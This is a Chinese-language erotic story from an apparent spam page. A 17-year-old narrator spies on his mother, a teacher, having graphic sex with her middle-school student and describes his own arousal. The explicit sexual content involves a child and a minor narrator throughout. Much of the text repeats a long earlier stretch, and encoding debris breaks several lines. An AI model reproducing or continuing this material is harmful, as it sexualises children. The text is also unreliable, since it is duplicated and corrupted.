<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      我的熟母被人干

        我叫小翔,今年17歲。是一名普通的高中生,留著普通的發型,穿著普通的衣服,過著普通的生活,我我就在我們這個小縣城里讀高中,所以每天都能回家,看到爸爸媽媽,吃到媽媽親手做的飯菜。

      我的媽媽叫王美霞,是縣城里一所初中的語文教師,雖然我們的家庭條件并不好,但媽媽對自己的儀容卻相當在意,衣柜里總是會留著兩套正裝,一套是冬季穿的西服,一套是夏季穿的OL裝,夏季當然不可缺的就是絲襪了,在媽媽的床頭柜里總是會放著幾雙或者未開封的或者洗干凈的肉色或黑色絲襪,媽媽從來不讓我接觸這些東西,對我來說媽媽的床頭柜就是我的禁地。

      我們縣城一共有兩所初中,就是所謂的一中和二中,而由于家中沒有靠山,所以媽媽只能到二中任教了。和所有的二流初中一樣,二中可以稱得上是惡魔聚居地,那些家中有權有勢,而子女卻又相當的不爭氣的家庭,父母為了不讓兒女背上文盲的稱呼,都會花大筆的錢讓自己的子女來這里。

      媽媽曾經親口告訴我,這里的學生平均每個月都要2000多的零花錢,天啊,
      這需要我的爸媽辛苦一個月才能賺到。我很慶幸我的成績很好。直接由一中保送
      到縣城的重點高中,我想這是我唯一值得自豪的事情了吧。

      學校雖然在縣城的最南方,但縣城本來就笑,加上我每天幾乎就是整路的低
      頭騎腳踏車,所以十幾分鐘就能到家里。今天上午老師說需要加訂學習資料,每
      個學生需要120 元,沒辦法,只能回家了,我平時一整天算上飯費也只有10元的,
      所以平時中午不回家的我今天中午回家了。

      十幾分鐘的順風路程便到家了,剛到家的樓下(房子是父親單位分的,只有
      80平,而且已經非常老舊了)發現樓門口停著一輛非常漂亮的山地車,我一直想
      要一輛來著,但是一想幾千塊錢的價格就忍住了。樓里誰會騎這么拉風的腳踏車?

      這棟樓里幾乎全都是下崗的老職工,但仔細一想可能是誰家的小孩子親戚就
      沒有再想太多,放好腳踏車并看了幾眼那輛拉風的山地車羨慕的走進了單元門。

      我家是一樓,誰讓老爸沒能力,當初分的時候只給老爸留下了這個冬天冷,
      夏天潮濕的一樓,哎……

      咚咚咚……敲了幾下門。媽媽平時十一點左右就會下班,我現在這個時間回
      家肯定會有人在的。

      “誰?”屋子里傳來媽媽的聲音,和平時不太一樣,似乎有點氣喘吁吁的?

      “媽,是我,小翔?!卑?,也可能是我剛騎腳踏車,心還沒平靜下來吧。

      “哦、、是、小翔啊、、媽媽正、在做家務、、稍微等一下、、、”媽媽的
      還是氣喘吁吁的樣子,說話的音調似乎也變的有點高高低低的。

      “嗯,知道了”我答道。原來媽媽在做家務,怪不得聲音很奇怪。

      “啊、、不行了、快點、到了、、”隱約的,我仿佛聽到了這種聲音。

      我在門外大概等了一分鐘,咔嚓,門開了,媽媽探出身子,臉紅紅,身上穿
      著平時的工作服:一身灰色的OL裝有些褶皺,腿上穿著肉色的絲襪也不再平整
      光滑,腳上的高跟鞋也半拖著。

      “?”媽媽平時回家了總會換上居家服飾,而且媽媽說她剛剛在做家務,按
      照媽媽的性格,怎么會穿著工作的服裝?而且做家務會累到臉這么紅嗎?

      “小翔,怎么今天中午這么突然的回來了?”媽媽紅著臉問我,看得出來,
      媽媽這在努力平息著自己的氣息。

      “哦,今天學校新增訂了一些資料,我回家來拿些錢?!逼婀?,平時我回家
      媽媽總是迫不及待的開門讓我進屋,怎么今天?說著我抬手想要拉開門,媽媽看
      到我的動作,急忙為我開門。

      “在學校打個電話就可以了,媽媽給你送過去?!眿寢屨f著讓我進屋里。

      “沒事的,路程這么近,再說了我正好出來透透風?!?br>
      走到屋里的客廳,忽然看到有個初中生模樣的男生正一臉舒爽但略顯尷尬坐
      在沙發上,衣服整身都是名牌。只不過現在看上去歪歪扭扭的穿在身上,相當的
      有喜感。想來是媽媽的學生吧,哎,看人家有錢人的孩子。不過這個時間媽媽帶
      自己的學生回來做什么?

      媽媽似乎看到了我的疑問,急忙在旁邊說道:“小翔,這個男生是媽媽的學
      生,陳超,今天來咱們家是……”媽媽似乎有些猶豫。

      一邊的叫陳超的男生趕忙接話:“是王老師主動帶我來補課的,老師想提高
      我的成績?!闭f著看向了媽媽。

      媽媽一聽也就應和說平時看到陳超雖然成績并不理想,但是人很聰明的,所
      以今天特意給他補課。一旁的陳超聽到媽媽如此說,也退去了一臉的尷尬,笑著
      對我說:“你是小翔哥吧,常聽老師在課堂上提到你,讓我們向你學習,嘿嘿,
      老師還說我動手實踐能力很強哦………”說著看向了一旁的媽媽,媽媽臉更紅了,
      低頭不再看我們這邊。

      “真是的,學生開玩笑老媽都臉紅?!蔽倚睦锇档?。

      “既然小翔哥回來了,那我也就走了,下次我還要讓王老師給我補課哦”說
      著整理了身上的衣服離開了客廳,不一會我從窗戶看到陳超騎著那輛拉風的自行車
      離開了。

      “小翔,餓了嗎?要不要媽媽做飯?”媽媽的臉色現在好多了,笑著問我。

      “呵呵。不用了,媽,你現在把錢給我吧,我趕緊回學校,下午還有課?!?br>
      “小翔要好好學習哦,媽媽永遠都支持你?!闭f著遞過來兩百元鈔票。

      “我會的啦”接過錢,我便想轉身離開,咦?桌子底下怎么會有幾團衛生紙?


      我彎腰想撿起來,誰知媽媽更快,馬上就撿起來臉紅紅的把衛生紙攥在手心
      里。

      在媽媽撿衛生紙的一瞬間,我似乎聞到了什么氣味……

      手里拿著媽媽給的兩百元鈔票,我飛快的騎著自行車往學校趕。但心中卻總有
      些疑慮:媽媽為什么下班了還要穿著工作服?平時媽媽一回家肯定會最先做飯今
      天為什么沒有?那個學生是怎么回事?平時媽媽就算是面對怎樣的學生都不會帶
      回家補課的、、、

      哎,不想那么多了,這次媽媽給了兩百元,交了資料費,還能剩下八十多塊,
      夠我花一陣子的了,真棒。

      高中的課程總是這么無聊,課堂上的五十分鐘對我們這些年輕人來說無疑是
      一種煎熬,好在我的成績不錯,課堂上做一些小動作,老師也就睜一只眼閉一只
      眼的放過我了。

      把書平放在桌子上我聚精會神的看著書下的手機(嘿嘿,各位兄弟,高中的
      時候都用過這招吧?)手機是我爸淘汰下來的諾基亞N72 ,雖然很舊了,但是還
      能用。對了,這次來學校的時候路過我媽工作的二中,正好看到來我家補課的那
      個陳超在校門口正在和他的同學聊天,隱隱約約的聽到了熟母兩個字。什么意思?

      我雖然平時看過一些色情小說,但是熟母這兩個字我在我讀過的色情小說里
      卻是沒見過,到底是什么意思?要不就說現在的網絡真是便利,熟練的打開uc,
      上搜狗,搜索熟母兩個字,瞬間便出來了我想要的搜索結果,哎怎么是這樣子?

      只見搜索結果里赫然出現了:我的教師熟母,熟母的性誘惑、、、等等字眼,
      血氣方剛的我看到這些字眼瞬間血液就涌向了下體,我的教師熟母、、多么有誘
      惑性的名字,不知道為什么,看到這個名字,我總會想起我的媽媽王美霞,她不
      也是教師嗎?媽媽也可以被稱為教師熟母嗎?啊,我在想什么?!

      顫抖著打開我的教師熟母的連接,從第一段開始,我的臉便和下體一樣迅速
      的沖血,怎么會有這樣的媽媽?文章主人公的媽媽被她的學生逼迫著做愛、、怎
      么到第四章就沒有了?

      哎,媽媽做老師,卻被像兒子一樣的年紀的學生在廁所里,在車子里,甚至
      在辦公室里、、、、我幻想著,等等!為什么我會幻想到我的媽媽,和故事中的
      情節一樣。我不能再想下去了。

      迅速的關掉uc,拿起課本想靠書本上的內容趕走腦子的想法,但我總會不自
      覺的把自己的媽媽帶入小說的情節中。

      渾渾噩噩的讀過下午的時間,我想我是不能再呆在學校里了,因為下體總是
      因為腦子里胡亂的想法沖血,高中的我們是要上晚自習的,我以身體不適向老師
      請了假,離開了學校,我想現在家庭是唯一能讓我清醒的地方了。

      晃晃蕩蕩的我騎著自行車回到了家的樓下,把自行車放到單元樓口里,恩?為什
      么那個中午找媽媽補課的那個陳超的男孩的自行車現在還在這里?中午明明我見到
      他騎走了啊。帶著疑問我來到家門口。剛想敲門,就聽到門內傳出來斷斷續續的
      聲音。

      “啊、、你快點、、、萬一有人來呢、、、、”這是媽媽的聲音,但是媽媽
      在做什么?瞬間我想到了我的教師熟母的情節,不會的,媽媽怎么會?

      但接下來的聲音徹底打破我的幻想:“啊、、、速度太快了,我不行了、出
      來了、、啊、、”這是媽媽的聲音,但我聽著卻十分的陌生。

      怎么會,媽媽怎么會和自己的學生做愛?那個學生還那么小,今天中午他還
      稱呼我為小翔哥,這種情況不是只會出現在小說的情節里嗎?為什么會是我的媽
      媽?

      我的頭腦很亂,想沖進屋里大聲的質問媽媽為什么會和學生搞在一起。這時
      我感到血液正在一點一點的往下體涌去。怎么回事?我竟然勃起了,我用力的按
      著自己的下體,但肉棒卻越漲越大,最后支起了一個小帳篷。

      我像丟了魂一樣離開家門口,走到了窗外,窗簾沒拉,奇怪,為什么現在一
      點聲音都沒有了?我像著了魔一樣想看到屋子里的情況,但是窗戶還是很高的,
      對了,自行車!我推出自行車,放在窗下,雙腿小心翼翼的踩在了載物架上,努力的
      保持著平衡,慢慢地站了起來。

      有微弱的亮光,是我已經不用了的初中時的小臺燈,順著亮光,我看到了沙
      發前兩具身體交織在一起,媽媽被陳超壓在身下,上身伏在沙發上,下體無意識
      的晃動著,而媽媽的身上,陳超正用力的晃動著下體,雖然看的不是很清晰,但
      是能明顯的看出來一根碩大的肉棒快速的在媽媽的雙腿間出現,消失,不停的重
      復著。

      屋內的陳超壞壞的笑著,手中拿著一團東西,我知道那是什么,那是我平時
      怎么也不會碰到禁區里的東西,媽媽的肉色絲襪。陳超笑著抽插著身下的媽媽,
      看的出來媽媽真的很舒爽,因為媽媽的身體已經開始瘋狂的晃動了。

      此時我的下體已經非常的腫脹了,我伸手想撥弄一樣,但是不小心碰到了放
      在褲兜的手機。壞了,碰到的是通話鍵,而我上次通話是和媽媽、、、、我剛想
      伸手掛斷,只見屋里媽媽的手機此時已經亮了,但手持手機的并不是媽媽,而是
      陳超,陳超看了看手機屏幕,接著邪惡的笑了笑,按下了通話鍵、、、并遞到了
      媽媽的耳邊。糟了,現在掛斷已經來不及了。

      “喂,媽,我是小翔?!蔽矣仓^皮和媽媽通話。

      “嗯、、怎、、么了小翔?”

      我看到屋里的媽媽嘴一動一動的,“媽,我有點頭痛,你看看家里還有沒有
      止疼藥,我回家吃?!蔽揖幜艘粋€理由。

      “當然、、有了。??!”媽媽說完隨即是一聲很大聲的呻吟。

      我知道,那是陳超剛剛用力的插了下媽媽的小穴。

      媽媽回頭幽怨的看了眼陳超。

      “媽,怎么了?”

      “沒、事,一只很大的長蟲嚇了媽媽一跳?!?br>
      “哦,媽媽,那我掛了?!崩^續和媽媽通話簡直是煎熬。

      “嗯、、?。?!尿了!在我的子宮里射了?!眿寢屢詾槲乙呀洅炝?,此時再
      也不顧矜持,很大聲的放浪的呻吟著、、、、、、

      “尿,尿出來,我要看你這個高雅的女人被干到失禁!”陳超大聲的叫喊著,
      看得出來他現在相當的興奮。

      “嗯、、老師不行了,老師要被學生干到高潮了!”媽媽隨即大聲的呼喊出
      來,并且身體好像被電到一樣抖了起來,我在窗外能明顯看到媽媽的大腿上濕濕
      的痕跡。媽媽真的被她的學生干到尿失禁了。

      媽媽無力的趴在沙發上,全身在燈光的照射下能看出一種嫵媚的紅色,陳超
      似乎也射精了,他向后動了動,碩大的肉棒從媽媽的小穴里滑了出來,帶出來的
      是白白的精液、媽媽愛液以及尿液的混合物。

      陳超看向媽媽,臉上露出了齷齪的笑容,拿起散落在沙發旁邊的媽媽的內褲
      和絲襪,陳超細細的用媽媽最貼身的衣物擦拭著自己的肉棒。不一會,媽媽的衣
      物已經濕濕的發亮了,陳超拍了拍媽媽渾圓的大屁股,嘴一動一動的,但此時我
      已經沒有力氣在聽下去了,徒然的按下手機的掛機鍵,行尸走肉般的離開了。

      媽媽和她的學生做愛了,而且是在我家,媽媽被她的學生干的高潮迭起,媽
      媽這個素來以有修養著稱的女人在被她的學生抽插的時候喊出了最為下流的話。

      我不知道我是怎么離開的我一直認為的很溫暖的那個家,現在的我漫無目的
      的在街道上行走,我迷茫了,因為在當時我看到媽媽和她的學生做愛并被干到高
      潮的時候,我感到我的肉棒無比的堅硬,我應該做的不是憤怒的踹開門并暴揍那
      個陳超一頓嗎?為什么我會津津有味的看著媽媽被干?

      鈴……一陣手機鈴聲,我低頭一看,是媽媽打來的。

      “喂,媽,有什么事情嗎?”

      “小翔啊,媽媽今晚上可能要加班批改作業,晚上的時候你就和你爸湊合著
      做點晚飯吧,我大概要晚上十點多才能回家?!?br>
      “嗯,知道了。那媽你也注意身體?!?br>
      掛斷電話,值班批改作業?

      我想是被她的學生檢查身體才對吧。自嘲的笑了笑。

      不知道走了多久,抬頭一看,“好滋味—連鎖餐廳,正好餓了,便進去要了
      兩個驢肉火燒一碗小米粥坐在靠窗的位置吃了起來。

      看著窗外一涌而過的初中學生,我低頭看表,原來已經六點半了??焖俚某?br>完,準備回家休息,忽然發現與那些初中生逆行的兩個熟悉的身影,我的媽媽王
      美霞和她的學生陳超。呵呵。果然有情況。我急忙沖出餐廳,小心的跟上了媽媽
      和陳超。

      我和他們有二十幾米的距離,從背后看,陳超還是中午穿的那套衣服,而媽
      媽則是換上了平時基本不怎么穿的那套女士OL套裝,短短的裙子連膝蓋都沒有
      蓋住,似乎想讓人們更多的看到腿上的肉色絲襪還是濕濕的,小小的上衣也只是
      象征性的阻擾了人們注視衣服主任渾圓臀部的實現,露出的白嫩手臂、、、、、

      一路上陳超一直對媽媽動手動腳的,不是伸手環住媽媽的腰,就是突襲下媽
      媽的屁股。尾行了大概七八分鐘,便是媽媽平時工作的地方,二中。

      此時已經接近七點了,雖說天還不是很黑,但是二中已經相當冷清了。只有
      門衛那里亮著一盞燈。媽媽和陳超走到門衛那里低聲說了幾句話,便進去了,我
      急忙跟上,但還是被攔住了。

      “我是她兒子,我來給她送東西?!蔽抑钡恼f著,一點邏輯性都沒了。

      那門衛是一位老人,倒是沒為難我,便讓我進去了。

      壞了,在我跟門衛對話的時候,媽媽和陳超早已經不知道哪里去了,我看著
      空蕩蕩的校園一陣無奈。

      哎,記得媽媽說過她教學的班級是三班,帶著試試看的心態我走到了媽媽任
      教的班級門前,門是鎖著的,我貼上耳朵,沒有聲音。

      能在哪里呢?媽媽的辦公室?不太可能吧,今天晚上可是有值班的老師。雖
      然這樣想,但我還是邁步走向了媽媽的辦公室。

      辦公室的燈是亮著的,說明確實是有人的,我悄悄的繞到媽媽辦公室后邊的
      窗戶,幸虧辦公室是一樓,我在周圍找了幾塊轉頭墊腳,抬頭便往窗戶內望去。

      陳超坐在媽媽的辦公桌前,一臉舒服的表情,可是媽媽呢?

      難道媽媽去廁所了?可是我應該能看到的啊。等等,陳超的表情不對!我看
      到過陳超和媽媽做愛是那一臉舒爽的表情,他現在的樣子和那是一樣,可是、、
      忽然我想到了我的教師熟母那篇文章里的一個劇情,難道媽媽在用嘴?

      我木木的看著陳超,大概過了兩分鐘,陳超的身體忽然劇烈的抖動了幾下,
      接著大聲的喊了句:真舒服!而與此同時,媽媽的辦公桌微微的動了下,接著媽
      媽就從桌下鉆了出來,現在媽媽的樣子頭發有些凌亂,臉紅紅的,嘴角有些白白
      的東西。

      “誒呀我的王老師,你看你現在的樣子真是誘人啊,跟平時在講臺上教書育
      人的那個你真是差了好多啊?!标惓暗目粗鴭寢屝α?。

      而媽媽由于嘴里含著陳超的精液,所以只是用眼睛斜了一眼他,但任誰都能
      看出來眼中濃濃的春意。

      “我的好老師,精液可是滋陰養顏的好東西啊,別浪費?!?br>
      陳超這個混蛋竟然讓媽媽吃掉他射出來的精液!

      “媽媽,不能吃,不能咽下去啊?!蔽倚睦锬膮群爸?。

      媽媽看了看陳超,又低頭想了一會,似乎心里很矛盾,旁邊的陳超似乎看出
      來了媽媽的心理,隔著衣服就大力的揉弄了幾下媽媽性感的乳房。

      “啊~ ”媽媽張開嘴呻吟了一聲。

      窗外的我都能看到媽媽嘴里白色的精液,看得出來媽媽已經動情了,乳房上
      的小櫻桃調皮的想要從OL裝中掙脫,接著陳超貼到媽媽耳朵旁邊小聲說了幾句
      話,媽媽羞澀的看了眼陳超,然后眼睛一閉,做了我最不愿看到的動作,媽媽竟
      然真的吃下去了陳超的精液!陳超到底對媽媽說了什么??!

      窗外的我看到媽媽親口吃下學生射出的精液,整個人仿佛雷擊一般的呆在那
      里,但是令我想不到的是我的肉棒竟然又勃起了!

      我叫小翔,今年17歲。是一名普通的高中生,留著普通的發型,穿著普通的衣服,過著普通的生活,我我就在我們這個小縣城里讀高中,所以每天都能回家,看到爸爸媽媽,吃到媽媽親手做的飯菜。

      我的媽媽叫王美霞,是縣城里一所初中的語文教師,雖然我們的家庭條件并不好,但媽媽對自己的儀容卻相當在意,衣柜里總是會留著兩套正裝,一套是冬季穿的西服,一套是夏季穿的OL裝,夏季當然不可缺的就是絲襪了,在媽媽的床頭柜里總是會放著幾雙或者未開封的或者洗干凈的肉色或黑色絲襪,媽媽從來不讓我接觸這些東西,對我來說媽媽的床頭柜就是我的禁地。

      我們縣城一共有兩所初中,就是所謂的一中和二中,而由于家中沒有靠山,所以媽媽只能到二中任教了。和所有的二流初中一樣,二中可以稱得上是惡魔聚居地,那些家中有權有勢,而子女卻又相當的不爭氣的家庭,父母為了不讓兒女背上文盲的稱呼,都會花大筆的錢讓自己的子女來這里。

      媽媽曾經親口告訴我,這里的學生平均每個月都要2000多的零花錢,天啊,
      這需要我的爸媽辛苦一個月才能賺到。我很慶幸我的成績很好。直接由一中保送
      到縣城的重點高中,我想這是我唯一值得自豪的事情了吧。

      學校雖然在縣城的最南方,但縣城本來就笑,加上我每天幾乎就是整路的低
      頭騎腳踏車,所以十幾分鐘就能到家里。今天上午老師說需要加訂學習資料,每
      個學生需要120 元,沒辦法,只能回家了,我平時一整天算上飯費也只有10元的,
      所以平時中午不回家的我今天中午回家了。

      十幾分鐘的順風路程便到家了,剛到家的樓下(房子是父親單位分的,只有
      80平,而且已經非常老舊了)發現樓門口停著一輛非常漂亮的山地車,我一直想
      要一輛來著,但是一想幾千塊錢的價格就忍住了。樓里誰會騎這么拉風的腳踏車?

      這棟樓里幾乎全都是下崗的老職工,但仔細一想可能是誰家的小孩子親戚就
      沒有再想太多,放好腳踏車并看了幾眼那輛拉風的山地車羨慕的走進了單元門。

      我家是一樓,誰讓老爸沒能力,當初分的時候只給老爸留下了這個冬天冷,
      夏天潮濕的一樓,哎……

      咚咚咚……敲了幾下門。媽媽平時十一點左右就會下班,我現在這個時間回
      家肯定會有人在的。

      “誰?”屋子里傳來媽媽的聲音,和平時不太一樣,似乎有點氣喘吁吁的?

      “媽,是我,小翔?!卑?,也可能是我剛騎腳踏車,心還沒平靜下來吧。

      “哦、、是、小翔啊、、媽媽正、在做家務、、稍微等一下、、、”媽媽的
      還是氣喘吁吁的樣子,說話的音調似乎也變的有點高高低低的。

      “嗯,知道了”我答道。原來媽媽在做家務,怪不得聲音很奇怪。

      “啊、、不行了、快點、到了、、”隱約的,我仿佛聽到了這種聲音。

      我在門外大概等了一分鐘,咔嚓,門開了,媽媽探出身子,臉紅紅,身上穿
      著平時的工作服:一身灰色的OL裝有些褶皺,腿上穿著肉色的絲襪也不再平整
      光滑,腳上的高跟鞋也半拖著。

      “?”媽媽平時回家了總會換上居家服飾,而且媽媽說她剛剛在做家務,按
      照媽媽的性格,怎么會穿著工作的服裝?而且做家務會累到臉這么紅嗎?

      “小翔,怎么今天中午這么突然的回來了?”媽媽紅著臉問我,看得出來,
      媽媽這在努力平息著自己的氣息。

      “哦,今天學校新增訂了一些資料,我回家來拿些錢?!逼婀?,平時我回家
      媽媽總是迫不及待的開門讓我進屋,怎么今天?說著我抬手想要拉開門,媽媽看
      到我的動作,急忙為我開門。

      “在學校打個電話就可以了,媽媽給你送過去?!眿寢屨f著讓我進屋里。

      “沒事的,路程這么近,再說了我正好出來透透風?!?br>
      走到屋里的客廳,忽然看到有個初中生模樣的男生正一臉舒爽但略顯尷尬坐
      在沙發上,衣服整身都是名牌。只不過現在看上去歪歪扭扭的穿在身上,相當的
      有喜感。想來是媽媽的學生吧,哎,看人家有錢人的孩子。不過這個時間媽媽帶
      自己的學生回來做什么?

      媽媽似乎看到了我的疑問,急忙在旁邊說道:“小翔,這個男生是媽媽的學
      生,陳超,今天來咱們家是……”媽媽似乎有些猶豫。

      一邊的叫陳超的男生趕忙接話:“是王老師主動帶我來補課的,老師想提高
      我的成績?!闭f著看向了媽媽。

      媽媽一聽也就應和說平時看到陳超雖然成績并不理想,但是人很聰明的,所
      以今天特意給他補課。一旁的陳超聽到媽媽如此說,也退去了一臉的尷尬,笑著
      對我說:“你是小翔哥吧,常聽老師在課堂上提到你,讓我們向你學習,嘿嘿,
      老師還說我動手實踐能力很強哦………”說著看向了一旁的媽媽,媽媽臉更紅了,
      低頭不再看我們這邊。

      “真是的,學生開玩笑老媽都臉紅?!蔽倚睦锇档?。

      “既然小翔哥回來了,那我也就走了,下次我還要讓王老師給我補課哦”說
      著整理了身上的衣服離開了客廳,不一會我從窗戶看到陳超騎著那輛拉風的自行車
      離開了。

      “小翔,餓了嗎?要不要媽媽做飯?”媽媽的臉色現在好多了,笑著問我。

      “呵呵。不用了,媽,你現在把錢給我吧,我趕緊回學校,下午還有課?!?br>
      “小翔要好好學習哦,媽媽永遠都支持你?!闭f著遞過來兩百元鈔票。

      “我會的啦”接過錢,我便想轉身離開,咦?桌子底下怎么會有幾團衛生紙?

      我彎腰想撿起來,誰知媽媽更快,馬上就撿起來臉紅紅的把衛生紙攥在手心
      里。

      在媽媽撿衛生紙的一瞬間,我似乎聞到了什么氣味……

      手里拿著媽媽給的兩百元鈔票,我飛快的騎著自行車往學校趕。但心中卻總有
      些疑慮:媽媽為什么下班了還要穿著工作服?平時媽媽一回家肯定會最先做飯今
      天為什么沒有?那個學生是怎么回事?平時媽媽就算是面對怎樣的學生都不會帶
      回家補課的、、、

      哎,不想那么多了,這次媽媽給了兩百元,交了資料費,還能剩下八十多塊,
      夠我花一陣子的了,真棒。

      高中的課程總是這么無聊,課堂上的五十分鐘對我們這些年輕人來說無疑是
      一種煎熬,好在我的成績不錯,課堂上做一些小動作,老師也就睜一只眼閉一只
      眼的放過我了。

      把書平放在桌子上我聚精會神的看著書下的手機(嘿嘿,各位兄弟,高中的
      時候都用過這招吧?)手機是我爸淘汰下來的諾基亞N72 ,雖然很舊了,但是還
      能用。對了,這次來學校的時候路過我媽工作的二中,正好看到來我家補課的那
      個陳超在校門口正在和他的同學聊天,隱隱約約的聽到了熟母兩個字。什么意思?

      我雖然平時看過一些色情小說,但是熟母這兩個字我在我讀過的色情小說里
      卻是沒見過,到底是什么意思?要不就說現在的網絡真是便利,熟練的打開uc,
      上搜狗,搜索熟母兩個字,瞬間便出來了我想要的搜索結果,哎怎么是這樣子?

      只見搜索結果里赫然出現了:我的教師熟母,熟母的性誘惑、、、等等字眼,
      血氣方剛的我看到這些字眼瞬間血液就涌向了下體,我的教師熟母、、多么有誘
      惑性的名字,不知道為什么,看到這個名字,我總會想起我的媽媽王美霞,她不
      也是教師嗎?媽媽也可以被稱為教師熟母嗎?啊,我在想什么?!

      顫抖著打開我的教師熟母的連接,從第一段開始,我的臉便和下體一樣迅速
      的沖血,怎么會有這樣的媽媽?文章主人公的媽媽被她的學生逼迫著做愛、、怎
      么到第四章就沒有了?

      哎,媽媽做老師,卻被像兒子一樣的年紀的學生在廁所里,在車子里,甚至
      在辦公室里、、、、我幻想著,等等!為什么我會幻想到我的媽媽,和故事中的
      情節一樣。我不能再想下去了。

      迅速的關掉uc,拿起課本想靠書本上的內容趕走腦子的想法,但我總會不自
      覺的把自己的媽媽帶入小說的情節中。

      渾渾噩噩的讀過下午的時間,我想我是不能再呆在學校里了,因為下體總是
      因為腦子里胡亂的想法沖血,高中的我們是要上晚自習的,我以身體不適向老師
      請了假,離開了學校,我想現在家庭是唯一能讓我清醒的地方了。

      晃晃蕩蕩的我騎著自行車回到了家的樓下,把自行車放到單元樓口里,恩?為什
      么那個中午找媽媽補課的那個陳超的男孩的自行車現在還在這里?中午明明我見到
      他騎走了啊。帶著疑問我來到家門口。剛想敲門,就聽到門內傳出來斷斷續續的
      聲音。

      “啊、、你快點、、、萬一有人來呢、、、、”這是媽媽的聲音,但是媽媽
      在做什么?瞬間我想到了我的教師熟母的情節,不會的,媽媽怎么會?

      但接下來的聲音徹底打破我的幻想:“啊、、、速度太快了,我不行了、出
      來了、、啊、、”這是媽媽的聲音,但我聽著卻十分的陌生。

      怎么會,媽媽怎么會和自己的學生做愛?那個學生還那么小,今天中午他還
      稱呼我為小翔哥,這種情況不是只會出現在小說的情節里嗎?為什么會是我的媽
      媽?

      我的頭腦很亂,想沖進屋里大聲的質問媽媽為什么會和學生搞在一起。這時
      我感到血液正在一點一點的往下體涌去。怎么回事?我竟然勃起了,我用力的按
      著自己的下體,但肉棒卻越漲越大,最后支起了一個小帳篷。

      我像丟了魂一樣離開家門口,走到了窗外,窗簾沒拉,奇怪,為什么現在一
      點聲音都沒有了?我像著了魔一樣想看到屋子里的情況,但是窗戶還是很高的,
      對了,自行車!我推出自行車,放在窗下,雙腿小心翼翼的踩在了載物架上,努力的
      保持著平衡,慢慢地站了起來。

      有微弱的亮光,是我已經不用了的初中時的小臺燈,順著亮光,我看到了沙
      發前兩具身體交織在一起,媽媽被陳超壓在身下,上身伏在沙發上,下體無意識
      的晃動著,而媽媽的身上,陳超正用力的晃動著下體,雖然看的不是很清晰,但
      是能明顯的看出來一根碩大的肉棒快速的在媽媽的雙腿間出現,消失,不停的重
      復著。

      屋內的陳超壞壞的笑著,手中拿著一團東西,我知道那是什么,那是我平時
      怎么也不會碰到禁區里的東西,媽媽的肉色絲襪。陳超笑著抽插著身下的媽媽,
      看的出來媽媽真的很舒爽,因為媽媽的身體已經開始瘋狂的晃動了。

      此時我的下體已經非常的腫脹了,我伸手想撥弄一樣,但是不小心碰到了放
      在褲兜的手機。壞了,碰到的是通話鍵,而我上次通話是和媽媽、、、、我剛想
      伸手掛斷,只見屋里媽媽的手機此時已經亮了,但手持手機的并不是媽媽,而是
      陳超,陳超看了看手機屏幕,接著邪惡的笑了笑,按下了通話鍵、、、并遞到了
      媽媽的耳邊。糟了,現在掛斷已經來不及了。

      “喂,媽,我是小翔?!蔽矣仓^皮和媽媽通話。

      “嗯、、怎、、么了小翔?”

      我看到屋里的媽媽嘴一動一動的,“媽,我有點頭痛,你看看家里還有沒有
      止疼藥,我回家吃?!蔽揖幜艘粋€理由。

      “當然、、有了。??!”媽媽說完隨即是一聲很大聲的呻吟。

      我知道,那是陳超剛剛用力的插了下媽媽的小穴。

      媽媽回頭幽怨的看了眼陳超。

      “媽,怎么了?”

      “沒、事,一只很大的長蟲嚇了媽媽一跳?!?br>
      “哦,媽媽,那我掛了?!崩^續和媽媽通話簡直是煎熬。

      “嗯、、?。?!尿了!在我的子宮里射了?!眿寢屢詾槲乙呀洅炝?,此時再
      也不顧矜持,很大聲的放浪的呻吟著、、、、、、

      “尿,尿出來,我要看你這個高雅的女人被干到失禁!”陳超大聲的叫喊著,
      看得出來他現在相當的興奮。

      “嗯、、老師不行了,老師要被學生干到高潮了!”媽媽隨即大聲的呼喊出
      來,并且身體好像被電到一樣抖了起來,我在窗外能明顯看到媽媽的大腿上濕濕
      的痕跡。媽媽真的被她的學生干到尿失禁了。

      媽媽無力的趴在沙發上,全身在燈光的照射下能看出一種嫵媚的紅色,陳超
      似乎也射精了,他向后動了動,碩大的肉棒從媽媽的小穴里滑了出來,帶出來的
      是白白的精液、媽媽愛液以及尿液的混合物。

      陳超看向媽媽,臉上露出了齷齪的笑容,拿起散落在沙發旁邊的媽媽的內褲
      和絲襪,陳超細細的用媽媽最貼身的衣物擦拭著自己的肉棒。不一會,媽媽的衣
      物已經濕濕的發亮了,陳超拍了拍媽媽渾圓的大屁股,嘴一動一動的,但此時我
      已經沒有力氣在聽下去了,徒然的按下手機的掛機鍵,行尸走肉般的離開了。

      媽媽和她的學生做愛了,而且是在我家,媽媽被她的學生干的高潮迭起,媽
      媽這個素來以有修養著稱的女人在被她的學生抽插的時候喊出了最為下流的話。

      我不知道我是怎么離開的我一直認為的很溫暖的那個家,現在的我漫無目的
      的在街道上行走,我迷茫了,因為在當時我看到媽媽和她的學生做愛并被干到高
      潮的時候,我感到我的肉棒無比的堅硬,我應該做的不是憤怒的踹開門并暴揍那
      個陳超一頓嗎?為什么我會津津有味的看著媽媽被干?

      鈴……一陣手機鈴聲,我低頭一看,是媽媽打來的。

      “喂,媽,有什么事情嗎?”

      “小翔啊,媽媽今晚上可能要加班批改作業,晚上的時候你就和你爸湊合著
      做點晚飯吧,我大概要晚上十點多才能回家?!?br>
      “嗯,知道了。那媽你也注意身體?!?br>
      掛斷電話,值班批改作業?

      我想是被她的學生檢查身體才對吧。自嘲的笑了笑。

      不知道走了多久,抬頭一看,“好滋味—連鎖餐廳,正好餓了,便進去要了
      兩個驢肉火燒一碗小米粥坐在靠窗的位置吃了起來。

      看著窗外一涌而過的初中學生,我低頭看表,原來已經六點半了??焖俚某?br>完,準備回家休息,忽然發現與那些初中生逆行的兩個熟悉的身影,我的媽媽王
      美霞和她的學生陳超。呵呵。果然有情況。我急忙沖出餐廳,小心的跟上了媽媽
      和陳超。

      我和他們有二十幾米的距離,從背后看,陳超還是中午穿的那套衣服,而媽
      媽則是換上了平時基本不怎么穿的那套女士OL套裝,短短的裙子連膝蓋都沒有
      蓋住,似乎想讓人們更多的看到腿上的肉色絲襪還是濕濕的,小小的上衣也只是
      象征性的阻擾了人們注視衣服主任渾圓臀部的實現,露出的白嫩手臂、、、、、

